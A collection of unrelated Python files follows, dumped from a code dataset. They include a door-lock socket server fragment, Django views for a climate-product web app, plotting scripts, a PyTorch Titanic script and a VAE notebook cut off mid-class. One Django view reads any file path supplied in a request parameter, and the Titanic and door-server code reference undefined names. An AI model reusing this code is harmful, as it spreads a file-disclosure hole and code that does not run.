ApplicationServer.parse_packet(packet) --> list\n \"\"\"\n return data.decode().split('\\x00')\n\n\n \n def log_it(self, error_info, device):\n \"\"\"\n Logs an error to the log file.\n \n ApplicationServer.log_it(error) --> None\n \"\"\"\n d = {'identifier': '{}'.format(device)}\n self.log.error(self.formatter.formatException(error_info), extra=d)\n \n \n \n def client_type(self, identifier):\n \"\"\"\n Determines client type from the given identifier.\n \n ApplicationServer.client_type(id) --> str\n \"\"\"\n # doorlock\n if identifier.startswith(\"D\"):\n return \"D\"\n \n # app\n elif identifier.startswith(\"M\"):\n return \"M\"\n \n # not a valid id\n else:\n return \"\"\n\n\n \n def add_command(self, cmd):\n \"\"\"\n Add a command packet to the command list.\n \n ApplicationServer.add_command(packet) --> None\n \"\"\" \n for c in self.cmd_list:\n \n if cmd[0] in c:\n self.cmd_list.remove(c)\n self.cmd_list.append(cmd)\n\n return\n \n self.cmd_list.append(cmd) \n \n \n \n\n\n\n##################################################\n # DELETED FUNCTIONS\n##################################################\n \n \"\"\"\n thread method to handle app\n \"\"\"\n def app_thread(self, socket, address, ID):\n print(\"DEBUG: connected to app at {}:{}\".format(address[0], address[1]))\n connected = True\n \n socket.sendall(self.make_packet(\"DATA\", \"CONNECTED\"))\n\n while connected:\n recv = socket.recv(4096) \n print(\"DEBUG: \".format(recv)) \n \n if recv_msg.startswith(\"LOCK DOOR\"): \n # $ get ready to lock door\n \n recv_msg, door_number = recv_msg.split('&') \n socket.sendall(self.make_packet(\"ACK\", \"LOCK DOOR&\" + door_number))\n \n \"\"\"\n add to queue?\n \"\"\"\n \n print(\"DEBUG: finished lock\")\n \n \n elif recv_msg.startswith(\"UNLOCK DOOR\"):\n # $ get ready to unlock door\n \n recv_msg, door_number = recv_msg.split('&')\n socket.sendall(self.make_packet(\"ACK\", \"UNLOCK DOOR&\" + door_number))\n \n \"\"\"\n add to queue?\n \"\"\" \n \n print(\"DEBUG: finished unlock\")\n \n \n elif recv_msg == \"SHUTTING DOWN\":\n socket.close()\n connected = False \n \n \n \n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":17276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457544414","text":"import autoarray as aa\nimport autoarray.plot as aplt\n\ngrid_7x7 = aa.grid.uniform(shape_2d=(7, 7), pixel_scales=0.3)\ngrid_3x3 = aa.grid.uniform(shape_2d=(3, 3), pixel_scales=1.0)\nrectangular_grid = aa.grid_rectangular.overlay_grid(grid=grid_3x3, shape_2d=(3, 3))\nrectangular_mapper = aa.mapper(grid=grid_7x7, pixelization_grid=rectangular_grid)\n\naplt.mapper_obj(\n mapper=rectangular_mapper,\n include=aplt.Include(\n inversion_pixelization_grid=True, inversion_grid=True, inversion_border=True\n ),\n image_pixel_indexes=[[(0, 0), (0, 1)], [(1, 2)]],\n source_pixel_indexes=[[0, 1], [2]],\n)\n","sub_path":"test_autoarray/plot/mapper_rectangular/all.py","file_name":"all.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"303232383","text":"from django.shortcuts import render, redirect, reverse\nfrom .forms import NewProductRequestForm\nfrom oktav.products.product_processing import ProductRequest\nfrom oktav.visualization.vis import createMapColors\nfrom oktav.utils import importObject\nfrom .models import ProductFeature, Widget, Season, Analysis, OutputType, AggregationPeriod\nfrom region.models import Municipality\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\nfrom django.http import FileResponse\nfrom django.views.generic.edit import DeleteView\nfrom django.conf import settings\nfrom django.core.files.storage import File\nimport django\n\nimport json\nimport ast\n\ndefault_colorbar_dict = '{\"color_scale\":\"alfa\",\"minval\":-20,\"maxval\":35,\"step_size\":1,\"bins\":\"None\",\"color_count\":56,\"reverse\":false}'\n\ndef home(request):\n return render(request, 'home.html')\n\ndef requestPOSTFunction(request_post):\n prf = NewProductRequestForm(request_post)\n print(prf.errors)\n #print(request_post)\n if prf.is_valid():\n\n ########## visual settings ##########\n get_colorbar_dict = request_post.get('colorscale_colorbar_dict_extra')\n cscale = default_colorbar_dict if get_colorbar_dict == '' else get_colorbar_dict\n cscale_loaded = json.loads(cscale)\n cscale_loaded['bins'] = None if cscale_loaded['bins'] == 'None' else cscale_loaded['bins']\n\n extended_cscale = createMapColors(\n color_scale = cscale_loaded['color_scale'],\n minval = cscale_loaded['minval'],\n maxval= cscale_loaded['maxval'],\n step_size = cscale_loaded['step_size'],\n bins = cscale_loaded['bins'],\n color_count = cscale_loaded['color_count'],\n reverse = cscale_loaded['reverse'])\n\n product_settings = ProductFeature.objects.filter(name=request_post.get('product_type'))[0]\n product_second_param = product_settings.has_second_parameter\n product_extras = ast.literal_eval(product_settings.extra)\n\n visual_settings = {\n 'colorscale': extended_cscale,\n 'figsize_x': product_extras['figsize_x'], 'figsize_y': product_extras['figsize_y'], 'dpi': product_extras['dpi'],\n 'rivers': request_post.get('rivers_extra') == 'on',\n 'municipality_borders': request_post.get('municipality_borders_extra') == 'on',\n 'state_borders': request_post.get('state_borders_extra') == 'on',\n 'country_borders': request_post.get('country_borders_extra') == 'on', \n 'hillshade': request_post.get('hillshade_extra') == 'on',\n 'linediagram_grid': request_post.get('linediagram_grid_extra') == 'on',\n 'smooth': request_post.get('smooth_extra') == 'on',\n 'infobox': request_post.get('infobox_extra') == 'on',\n 'boxplot': request_post.get('boxplot_extra') == 'on',\n 'title': request_post.get('title_extra') == 'on',\n 'secondary_y_axis': request_post.get('secondary_y_axis_extra') == 'on'\n }\n ################################\n\n ########## 2nd parameter ##########\n if product_second_param:\n param = [request_post.get('parameter'), request_post.get('parameter2')]\n else:\n param = request_post.get('parameter')\n ################################\n\n ########## season ##########\n if request_post.get('aggregation_period') == 'YS':\n datum_start = '-01-01'\n datum_end = '-01-01'\n elif request_post.get('aggregation_period') == 'QS-DEC':\n obj = Season.objects.filter(name=request_post.get('season'))[0]\n datum_start = getattr(obj, 'datum_start')\n datum_end = getattr(obj, 'datum_end')\n ################################\n\n\n ########## region ##########\n if request_post.get('region_option') == 'austria': # austria\n region = ['austria']\n else: # bundesland, municipality\n region_a = (request_post.get('region')[0:-2]).split(\",\")\n region = [a.lstrip() for a in region_a]\n\n if request_post.get('region_option') == 'municipality':\n region_list = []\n for i in region:\n region_list.append(str(Municipality.objects.filter(name=i)[0].gkz))\n else:\n region_list = region\n\n ################################\n\n\n ########## height filters ##########\n lhf_from_html = request_post.get('lower_height_filter')\n uhf_from_html = request_post.get('upper_height_filter')\n if uhf_from_html == '0':\n adj_upper_height_filter = None\n if lhf_from_html == '0':\n adj_lower_height_filter = None\n else:\n adj_lower_height_filter = int(lhf_from_html)\n else:\n adj_upper_height_filter = int(uhf_from_html)\n if lhf_from_html == '0':\n adj_lower_height_filter = 0\n else:\n adj_lower_height_filter = int(lhf_from_html)\n ################################\n\n\n ########## reference period ##########\n if 'reference_period_checkbox' in request_post.keys():\n if request_post.get('reference_period_checkbox') != 'on':\n refper = None\n refper_checkbox_for_settings = \"off\"\n else:\n refper_checkbox_for_settings = \"on\"\n refper = [\n request_post.get('reference_period_start')+datum_start,\n request_post.get('reference_period_end')+datum_end\n ]\n else:\n refper_checkbox_for_settings = \"off\"\n refper = None\n ################################\n\n PR = ProductRequest(\n product_type = request_post.get('product_type'),\n parameter = param,\n aggregation_period = request_post.get('aggregation_period'),\n season = request_post.get('season'),\n scenario = [request_post.get('scenario')],\n region_option = request_post.get('region_option'),\n region = region_list,\n period = [request_post.get('period_start')+datum_start, request_post.get('period_end')+datum_end],\n reference_period = refper,\n lower_height_filter = adj_lower_height_filter,\n upper_height_filter = adj_upper_height_filter,\n visual_settings = visual_settings,\n output_path = request_post.get('output_path'),\n output_type = request_post.get('output_type'),\n django = True,\n django_path = settings.BASE_DIR + '/media/'\n )\n #print(PR.__dict__)\n product_func = ProductFeature.objects.filter(name = PR.product_type)[0].function\n func = getattr(PR, product_func)\n\n otype = OutputType.objects.filter(name = PR.output_type)[0].otype\n ofilename = PR.outname.split('/')[-1]\n def_filename = settings.MEDIA_ROOT + '/' + ofilename\n\n ################## settings dictionary ##################x\n\n \n if region[0] == 'austria':\n region_list_for_settings = ''\n else:\n region_list_for_settings = (', ').join(region) + ', '\n\n \n if request_post.get('aggregation_period') == 'YS':\n season_for_settings = \"DJF\"\n else:\n season_for_settings = request_post.get('season')\n \n settings_dict = {\n \"id_product_type\": request_post.get('product_type'),\n \"id_scenario\": request_post.get('scenario'),\n \"id_parameter\": request_post.get('parameter'),\n \"id_parameter2\": request_post.get('parameter2'),\n \"id_aggregation_period\": request_post.get('aggregation_period'),\n \"id_season\": season_for_settings,\n \"id_region_option\": request_post.get('region_option'),\n \"id_region\": region_list_for_settings,\n \"id_period_start\": request_post.get('period_start'),\n \"id_period_end\": request_post.get('period_end'),\n \"id_reference_period_checkbox\": refper_checkbox_for_settings,\n \"id_reference_period_start\": request_post.get('reference_period_start'),\n \"id_reference_period_end\": request_post.get('reference_period_end'),\n \"id_lower_height_filter\": request_post.get('lower_height_filter'),\n \"id_upper_height_filter\": request_post.get('upper_height_filter'),\n \"id_output_type\": request_post.get('output_type'),\n \"id_output_path\": request_post.get('output_path'),\n \"id_colorscale_colorbar_dict_extra\": request_post.get('colorscale_colorbar_dict_extra'),\n \"id_colorscale_name_extra\": cscale_loaded['color_scale'],\n \"id_colorscale_minval_extra\": cscale_loaded['minval'],\n \"id_colorscale_step_size_extra\": cscale_loaded['step_size'],\n \"id_colorscale_reverse_extra\": cscale_loaded['reverse'],\n \"id_rivers_extra\": request_post.get('rivers_extra'),\n \"id_municipality_borders_extra\": request_post.get('municipality_borders_extra'),\n \"id_state_borders_extra\": request_post.get('state_borders_extra'),\n \"id_country_borders_extra\": request_post.get('country_borders_extra'),\n \"id_hillshade_extra\": request_post.get('hillshade_extra'),\n \"id_linediagram_grid_extra\": request_post.get('linediagram_grid_extra'),\n \"id_smooth_extra\": request_post.get('smooth_extra'),\n \"id_infobox_extra\": request_post.get('infobox_extra'),\n \"id_boxplot_extra\": request_post.get('boxplot_extra'),\n \"id_title_extra\": request_post.get('title_extra'),\n \"id_secondary_y_axis_extra\": request_post.get('secondary_y_axis_extra')\n }\n\n\n analysis = Analysis(content_type = otype, filename = ofilename, analysis_details = PR, settings_json = json.dumps(settings_dict))\n func()\n \n analysis.file.save(def_filename, File(open(def_filename, 'rb')))\n analysis.file.name = ofilename\n analysis.save()\n \n #print(request.POST)\n return analysis.id\n\n\ndef product_request(request):\n if request.method == 'POST':\n id = requestPOSTFunction(request_post = request.POST)\n return HttpResponseRedirect(reverse('analysis_result', args=(id,)))\n else:\n prf = NewProductRequestForm()\n return render(request, 'products.html', {'product_form': prf})\n\ndef product_request_refine(request, pk):\n if request.method == 'POST':\n id = requestPOSTFunction(request_post = request.POST)\n return HttpResponseRedirect(reverse('analysis_result', args=(id,)))\n else:\n prf = NewProductRequestForm()\n return render(request, 'products.html', {'product_form': prf, 'analysis_id': pk})\n\ndef analysis_result(request, pk):\n analysis = get_object_or_404(Analysis, pk = pk)\n return render(request, 'analysis_result.html', {'analysis': analysis})\n\n\nclass AnalysisDeleteView(DeleteView):\n model = Analysis\n template_name=\"analysis_confirm_delete.html\"\n\n def get_success_url(self):\n return reverse('index')\n\ndef index(request):\n return render(request, 'index.html')\n\ndef fetch_product_features(request):\n if request.is_ajax():\n q = request.GET.get('product_name', '')\n field = request.GET.get('field', '')\n selected_product = ProductFeature.objects.filter(name = q)[0]\n attrs_to_remove = ['_state', 'id']\n if field == 'all':\n product_attributes = list(selected_product.__dict__.keys())\n product_attributes = [ele for ele in product_attributes if ele not in attrs_to_remove]\n product_feature_dict = {}\n for attr in product_attributes:\n product_feature_dict[attr] = getattr(selected_product, attr)\n data = json.dumps(product_feature_dict)\n elif field == 'widgets':\n attribute_values = getattr(selected_product, field)\n if attribute_values != 'None':\n widget_list = attribute_values.split(',')\n widget_dict = {}\n for w in widget_list:\n widget_object = Widget.objects.filter(name = w)[0]\n widget_attributes = list(widget_object.__dict__.keys())\n widget_attributes = [ele for ele in widget_attributes if ele not in attrs_to_remove]\n w_inner_dict = {}\n for wattr in widget_attributes:\n w_inner_dict[wattr] = getattr(widget_object, wattr)\n widget_dict[w] = w_inner_dict\n\n result = {field: widget_dict}\n data = json.dumps(result)\n else:\n data = json.dumps({\"widgets\": {\"None\": \"None\"}})\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\ndef get_queryset_attribute_values(qset, attr='name'):\n qlist = []\n for e in qset:\n qlist.append(getattr(e, attr))\n\n return ','.join([q for q in qlist])\n\ndef get_static_file(request):\n if request.is_ajax():\n rfile = request.GET.get('file', '')\n with open(rfile) as json_file:\n data = json.load(json_file)\n \n res = json.dumps(data)\n else:\n res = 'fail'\n mimetype = 'application/json'\n return HttpResponse(res, mimetype)\n\ndef get_enabled_parameters_by_aggp(request):\n if request.is_ajax():\n aggp_type = request.GET.get('aggp_type', '')\n aggp = AggregationPeriod.objects.filter(name=aggp_type)[0]\n data = aggp.enabled_parameters.split(',')\n data = json.dumps(data)\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n\ndef documentation(request):\n return render(request, '_build/html/index.html')\n\ndef getModelObjects(request):\n if request.is_ajax():\n model = request.GET.get('model', '').capitalize()\n obj = importObject(obj_name='products.models.' + model)\n all_objs = obj.objects.all()\n d = {}\n odict = {}\n for o in all_objs:\n odict = {o.name: {'name': o.name, 'enabled': o.enabled}}\n d.update(odict)\n\n result = {'objects': d}\n data = json.dumps(result)\n else:\n data = 'fail'\n \n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\ndef get_analysis_settings(request):\n if True: #request.is_ajax():\n analysis_id = request.GET.get('analysis_id', '')\n analysis = Analysis.objects.filter(id=analysis_id)[0]\n data = analysis.settings_json\n else:\n data = 'fail'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\ndef download(request, pk):\n analysis = get_object_or_404(Analysis, pk = pk)\n file = analysis.file\n return FileResponse(file, as_attachment=True, filename=file.name)","sub_path":"products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"253313556","text":"import numpy as np\nimport pandas as pd\nfrom matplotlib import rcParams\nrcParams['font.family'] = 'sans-serif'\nrcParams['font.sans-serif'] = ['Avenir']\nimport matplotlib.pyplot as plt\n\nplt.style.use('ggplot')\n\nresult_path = \"results/experiment_result_10000_data.csv\"\ndata = pd.read_csv(result_path, index_col=[\"order\"])\ndata[\"time_taken\"] = -data[\"time_taken\"]\n\n# 0. Summary Visualization\nfig, axs = plt.subplots(3, 1, figsize=(6, 12))\nmodel_names = [\"SVR/Kernel:linear\", \"SVR/Kernel:poly\", \"SVR/Kernel:rbf\", \"SVR/Kernel:sigmoid\",\n \"MLP/Size:16-16\", \"MLP/Size:32-32\"]\nbar_width = 0.15\nmax_x = 0\nX_labels = None\nfor mi, model_name in enumerate(model_names):\n f = data[data[\"spec\"] == model_name]\n x = np.arange(len(f))\n if len(f) > max_x:\n max_x = len(f)\n X_labels = f[\"window\"]\n xi = x + (mi - 3) / 6\n fr2 = f[\"r2\"]\n fr2[fr2 < 0] = 0\n axs[0].bar(xi, fr2, bar_width, label=model_name)\n fr2s = f[\"r2s\"]\n fr2s[fr2s < 0] = 0\n axs[1].bar(xi, fr2s, bar_width, label=model_name)\n ft = f[\"time_taken\"]\n ft[ft < 0] = 0\n axs[2].bar(xi, ft, bar_width, label=model_name)\n\naxs[0].set_ylabel(\"Adjusted R-Squared\")\naxs[0].set_title(\"(a) Adjusted R-Squared by Architectures\", fontdict={\"fontsize\": 'large'})\naxs[0].set_xticks(np.arange(max_x))\naxs[0].set_xticklabels(X_labels)\n\naxs[1].set_ylabel(\"Smoothed R-Squared\")\naxs[1].set_title(\"(b) Smoothed R-Squared by Architectures\", fontdict={\"fontsize\": 'large'})\naxs[1].set_xticks(np.arange(max_x))\naxs[1].set_xticklabels(X_labels)\n\naxs[2].set_ylabel(\"Time taken\")\naxs[2].set_title(\"(c) Time Taken for Training (ms)\", fontdict={\"fontsize\": 'large'})\naxs[2].set_xticks(np.arange(max_x))\naxs[2].set_xticklabels(X_labels)\n\naxs[2].legend(bbox_to_anchor=(1, -0.7), loc='lower right', fontsize=\"medium\")\n\nfig.tight_layout()\nplt.savefig(\"results/training_results_10000.png\")\n\n# 1. by R2\nrawr2 = data[[\"spec\", \"window\", \"r2\"]]\nwindows = np.unique(rawr2[\"window\"])\nmodel_names = [\"SVR/Kernel:linear\", \"SVR/Kernel:poly\", \"SVR/Kernel:rbf\", \"SVR/Kernel:sigmoid\",\n \"MLP/Size:16-16\", \"MLP/Size:32-32\"]\nrows = []\nfor w in windows:\n cells = []\n cells.append(w)\n for mi, model_name in enumerate(model_names):\n cv = rawr2[(rawr2['spec'] == model_name) & (rawr2['window'] == w)]['r2']\n cells.append(cv.values[0])\n rows.append(cells)\nrows = np.array(rows)\nprint(rows)\n# for latex\nprint(\"\\\\toprule\")\nprint(\"window & \"+\" & \".join(model_names)+\" \\\\\\\\\")\nprint(\"\\\\midrule\")\nfor row in rows:\n print(\" & \".join([str(np.round(c,2)) for c in row])+\" \\\\\\\\\")\nprint(\"\\\\bottomrule\")\n\n# 2. by Smoothed R2\nsmoor2 = data[[\"spec\", \"window\", \"r2s\"]]\nwindows = np.unique(smoor2[\"window\"])\nmodel_names = [\"SVR/Kernel:linear\", \"SVR/Kernel:poly\", \"SVR/Kernel:rbf\", \"SVR/Kernel:sigmoid\",\n \"MLP/Size:16-16\", \"MLP/Size:32-32\"]\nrows = []\nfor w in windows:\n cells = []\n cells.append(w)\n for mi, model_name in enumerate(model_names):\n cv = smoor2[(smoor2['spec'] == model_name) & (smoor2['window'] == w)]['r2s']\n cells.append(cv.values[0])\n rows.append(cells)\nrows = np.array(rows)\nprint(rows)\n# for latex\nprint(\"\\\\toprule\")\nprint(\"window & \"+\" & \".join(model_names)+\" \\\\\\\\\")\nprint(\"\\\\midrule\")\nfor row in rows:\n print(\" & \".join([str(np.round(c,2)) for c in row])+\" \\\\\\\\\")\nprint(\"\\\\bottomrule\")\n\n# 3. forcast\nsetups = [\n {\"model\": \"svr\", \"kernel\": \"linear\", \"window\": 13, \"outfn\": \"svr_linear_13\"},\n {\"model\": \"mlp\", \"size\": [32, 32], \"window\": 13, \"outfn\": \"mlp_32-32_13\"},\n {\"model\": \"svr\", \"kernel\": \"linear\", \"window\": 10, \"outfn\": \"svr_linear_10\"},\n {\"model\": \"mlp\", \"size\": [32, 32], \"window\": 10, \"outfn\": \"mlp_32-32_10\"}\n]\ncounties = [\n \"Cook/Illinois\",\n \"Lake/Illinois\"\n]\ncolor_maps = [\"steelblue\", \"palevioletred\"]\nn_regions = len(counties)\nfor setup in setups:\n data = pd.read_csv(\"results/\" + setup[\"outfn\"] + \".csv\")\n fig, axs = plt.subplots(1, n_regions, figsize=(7, 3))\n for ci, county in enumerate(counties):\n f = data[data[\"region\"] == county]\n pred = f[\"forecast\"]\n true = f[\"true\"]\n smoo = f[\"smoothed\"]\n x = np.arange(len(pred))\n axs[ci].plot(x, pred, color=color_maps[ci], linewidth=1, label=\"Forecast\")\n axs[ci].plot(x, true, color=color_maps[ci], linewidth=1, label=\"Raw\", linestyle=\"dotted\")\n axs[ci].plot(x, smoo, color=color_maps[ci], linewidth=1, label=\"Smoothed\", linestyle=\"dashed\")\n axs[ci].set_ylabel(\"Increment of cases\")\n axs[ci].set_xlabel(\"Days since Jan. 1, 2020\")\n axs[ci].set_title(county, fontdict={\"fontsize\": 'large'})\n axs[ci].legend(fontsize=\"medium\")\n fig.tight_layout()\n plt.savefig(\"results/fig_\" + setup[\"outfn\"] + \".png\")\n","sub_path":"exp/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":4723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"231343417","text":"from __future__ import print_function, division\nimport os\nimport torch\nimport pandas as pd\nfrom skimage import io, transform\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms, utils\n\ndtype = torch.float\ndevice = torch.device(\"cpu\")\n\n\"\"\"Possible improvements matching with last name to determine families.\"\"\"\n\"\"\"Data managing\"\"\"\ndata_train = pd.read_csv(\"../input/train.csv\")\ndata_test = pd.read_csv(\"../input/test.csv\")\n\n\"\"\"Only takes numbers.\n Needed columns: 'Pclass', 'Sex', 'Age', 'SibSp', 'Parch', 'Cabin'\n Embarked is not important because no mattter what you still fall into \n a certain class in a ship and you still have a set number of people\n travelling with you. Where you boarded does not matter, it's not like\n if you boarded on a certain location you are close to the top of the ship.\"\"\"\n#Fix Cabin and Sex\n\"\"\"for idx in range(0, len(data_train['Sex'])):\n if (data_train['Sex'][idx] == 'male'):\n data_train['Sex'][idx] = '0'\n\"\"\"\n\nx = np.array(data_train.loc[:, ['Pclass', 'Age', 'SibSp', 'Parch']])\n#x.astype(np.double)\nx = torch.from_numpy(x)\ny = np.array(data_train['Survived'])\ny = torch.from_numpy(y)\n#x = torch.from_numpy(np.array(data_train.loc[:, data_train.columns != 'Survived']))\n\n\"\"\"Neural Network specifics\"\"\"\ninp_layer = 4; #Each node corresponds to number of features\nH = 3; #Mean of number of neurons in input and output layer\nout_layer = 1; #Classifier\n\nbatch_size = 70; #Number of processed samples before updating model\n\n#Weights\nweight_1 = torch.randn(inp_layer, H, device=device, dtype=dtype)\nweight_2 = torch.randn(H, out_layer, device=device, dtype=dtype)\n\nlearning_rate = 1e-6\nprint (x.shape)\nprint (weight_1.shape)\n\nprint (type(x))\nprint (type(weight_1))\n\nfor trail in range(500):\n #Forward pass: Compute y\n xw = x.mm(weight_1)\n xw_relu = xw.clamp(min=0)#Essentially maximizing output from x . w (dot product)\n y_pred = xw_relu.mm(w2)#output predictiin after hidden layer (dot product)\n \n #Compute and print loss\n loss = (y_pred - y).pow(2).sum().item()\n print(trail, loss)\n \n #Backprop to compute gradients of weights wrt losses\n grad_y_pred = 2.0 * (y_pred - y)\n grad_weight2 = xw_relu.t().mm(grad_y_pred)\n grad_xw_relu = grad_y_pred.mm(weight2.trail())\n grad_xw = grad_h_relu.clone()\n grad_xw[xw < 0] = 0\n grad_weight1 = x.trail().mm(grad_xw)\n \n #Update weights - Gradient Descent \n weight_1 -= learning_rate * grad_w1\n weight_2 -= learning_rate * grad_w2","sub_path":"titanic_torch.py","file_name":"titanic_torch.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"489775885","text":"#\n# Copyright 2016 The BigDL Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\nimport torch\nfrom torchvision.models import resnet18\n\nif __name__ == \"__main__\":\n model_ft = resnet18(pretrained=True)\n\n x = torch.rand(2, 3, 224, 224)\n\n # Accelerated Inference Using JIT / JIT+IPEX\n from bigdl.nano.pytorch import InferenceOptimizer\n jit_model = InferenceOptimizer.trace(model_ft,\n accelerator=\"jit\",\n input_sample=torch.rand(1, 3, 224, 224))\n\n # Save Optimized JIT Model\n # The saved model files will be saved at \"./optimized_model_jit\" directory\n # There are 2 files in optimized_model_jit, users only need to take \"ckpt.pth\" file for further usage:\n # nano_model_meta.yml: meta information of the saved model checkpoint\n # ckpt.pth: JIT model checkpoint for general use, describes model structure\n InferenceOptimizer.save(jit_model, \"./optimized_model_jit\")\n\n # Load the Optimized Model\n loaded_model = InferenceOptimizer.load(\"./optimized_model_jit\")\n\n # Inference with the Loaded Model\n with InferenceOptimizer.get_context(loaded_model):\n y_hat = loaded_model(x)\n predictions = y_hat.argmax(dim=1)\n print(predictions)\n","sub_path":"python/nano/tutorial/inference/pytorch/pytorch_save_and_load_jit.py","file_name":"pytorch_save_and_load_jit.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"329142696","text":"from django.shortcuts import render_to_response\nfrom django.template import RequestContext\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import get_object_or_404\n\nfrom api.models import Event\nfrom web.forms.event_form import AddEvent\nfrom web.processors.event import create_or_update_event, get_event\n\ndef index(request):\n\treturn render_to_response(\n\t\t'pages/index.html',\n\t\t{'test': 'test'},\n\t\tcontext_instance=RequestContext(request))\n\ndef add_event(request):\n\tevent_form = AddEvent()\n\tif request.method ==\"POST\":\n\t\tevent_form = AddEvent(data=request.POST, files=request.FILES)\n\t\tif event_form.is_valid():\n\t\t\tevent_data = {}\n\t\t\tevent_data.update(event_form.cleaned_data)\n\t\t\tevent = create_or_update_event(**event_data)\n\t\t\treturn render_to_response(\n\t\t\t\t\t'pages/thankyou.html',\n\t\t\t\t\t{'title': event.title, 'event_id': event.id},\n\t\t\t\t\tcontext_instance=RequestContext(request))\n\tcontext = {\"form\": event_form}\n\treturn render_to_response(\"pages/add_event.html\", context, context_instance=RequestContext(request))\n\ndef view_event(request, event_id):\n\tevent = get_object_or_404(Event, pk=event_id)\n\tcontext = {'event': event}\n\treturn render_to_response(\"pages/view_event.html\", context, context_instance=RequestContext(request))\n\ndef search_event(request):\n\tpass\n\ndef thankyou(request):\n\treturn render_to_response('pages/thankyou.html')\n","sub_path":"codeweekeu/web/views/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"447496683","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.7.0\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nimport torch\n\nimport torch.utils.data\nfrom torch import nn, optim\nfrom torch.nn import functional as F\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.decomposition import FastICA\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis as LDA\n# -\n\n\nfrom modules.dataset import SoundDataset\nfrom modules.myfunc import ans2index_label_color_marker\nfrom modules.success_and_false import result, results_list\n\n\nclass VAE_without_label(nn.Module):\n def __init__(self,input_shape,z_shape=20,output_shape=11):\n super(VAE_without_label, self).__init__()\n \n self.input_shape = input_shape\n self.z_shape = z_shape\n self.output_shape = output_shape\n \n # encoder\n self.encoder = nn.Sequential()\n self.encoder.add_module('enc_conv1', nn.Conv1d(in_channels=3, out_channels=9, kernel_size=16, stride=10, padding=6, padding_mode='zeros'))\n self.encoder.add_module('enc_relu1', nn.ReLU(True))\n self.encoder.add_module('enc_conv2', nn.Conv1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=6, padding_mode='zeros'))\n self.encoder.add_module('enc_relu2', nn.ReLU(True))\n self.encoder.add_module('enc_conv3', nn.Conv1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=6, padding_mode='zeros'))\n self.encoder.add_module('enc_relu3', nn.ReLU(True))\n # z to mean\n self.encmean_fc11 = nn.Linear(int(input_shape/10/10/10*9), z_shape)\n # z to var\n self.encvar_fc12 = nn.Linear(int(input_shape/10/10/10*9), z_shape)\n \n # decoder\n self.dec_fc1 = nn.Linear(z_shape, int(input_shape/10/10/10*9))\n self.decoder = nn.Sequential()\n self.decoder.add_module('dec_deconv1', nn.ConvTranspose1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=3, padding_mode='zeros'))\n self.decoder.add_module('dec_relu1', nn.ReLU(True))\n self.decoder.add_module('dec_deconv2', nn.ConvTranspose1d(in_channels=9, out_channels=9, kernel_size=16, stride=10, padding=3, padding_mode='zeros'))\n self.decoder.add_module('dec_relu2', nn.ReLU(True))\n self.decoder.add_module('dec_deconv3', nn.ConvTranspose1d(in_channels=9, out_channels=3, kernel_size=16, stride=10, padding=3, padding_mode='zeros'))\n self.decoder.add_module('dec_sig1', nn.Sigmoid())\n \n def encode(self, x):\n x = x.view(x.size()[0],3,-1)\n x = self.encoder(x)\n x = x.view(x.size()[0], -1)\n return self.encmean_fc11(x), self.encvar_fc12(x)\n\n def reparameterize(self, mu, logvar):\n std = torch.exp(0.5*logvar)\n eps = torch.randn_like(std)\n return mu + eps*std\n \n def decode(self, z):\n x = self.dec_fc1(z)\n x = x.view(x.size()[0],9,-1)\n x = self.decoder(x)\n x = x.view(x.size()[0],3,-1)\n return x\n\n def forward(self, x):\n # encode\n mu, logvar = self.encode(x.view(-1, 3, self.input_shape).float())\n # reparameterize\n z = self.reparameterize(mu, logvar)\n pre_x = self.decode(z)\n \n return pre_x, mu, logvar\n \n def valid(self, x):\n mu, logvar = self.encode(x.view(-1, 3, self.input_shape).float())\n pre_x = self.decode(mu)\n \n return pre_x, mu, logvar\n \n def loss_function_vae(self, rec_x, x, mu, logvar, beta=2):\n BCE = F.binary_cross_entropy(rec_x, x.float(), reduction='sum')\n KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp())\n return BCE + KLD * beta\n\n\nclass VAE_without_label_trainer():\n def __init__(self, dim_z = 20, 